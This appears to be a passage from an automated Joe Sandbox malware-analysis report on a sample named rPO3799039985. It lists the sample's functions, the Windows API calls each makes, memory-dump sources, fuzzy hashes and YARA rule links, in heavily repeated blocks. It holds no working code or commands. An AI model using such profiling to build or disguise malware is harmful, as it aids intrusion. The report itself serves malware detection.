                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                          • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                                                          • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                                                                                                                                          Function 0040597D Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                                                                                                                          • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                                                                                                                                                                          Function 0040548B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040549F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                          • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                                          • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                                                                                                                                                          Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                                                                                          • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                                                                                                                          • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                                                                                                                                                                          Function 00401717 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PathSearch
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2203818243-0
                                                                                                                                                                                                          • Opcode ID: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                                                                                                                                                                          • Instruction ID: c7ce876e5ad96af4d980a0e505f4bdb0f2e6b31a9f033159e1f135e3aabe3218
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE0D872204100ABE300DB549D48FAA3758DB10368F304537F201A60C1D2B499459639
                                                                                                                                                                                                          Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                          • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                                                                                                                          • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                                                                                                                                          Function 00405A49 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                          • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                                          • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                                                                                                                                                          Function 00405A1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                                                          • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                                                                                                                                                          Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: ecbda0029c53e9a4e579cc28c48ab42295baff6aa2cc43667ddc013ae829b51b
                                                                                                                                                                                                          • Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecbda0029c53e9a4e579cc28c48ab42295baff6aa2cc43667ddc013ae829b51b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29
                                                                                                                                                                                                          Function 00403F60 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageA.USER32(000103DC,00000000,00000000,00000000), ref: 00403F72
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                          • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                                                                                                                          • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                                                                                                                                                          Function 00403F49 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                          • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                                                                                                                          • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                                                                                                                                                          Function 004030C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                          • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                                          • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                                                                                                          Function 00403F36 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                          • Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                                                                                                                                                          • Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
                                                                                                                                                                                                          Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
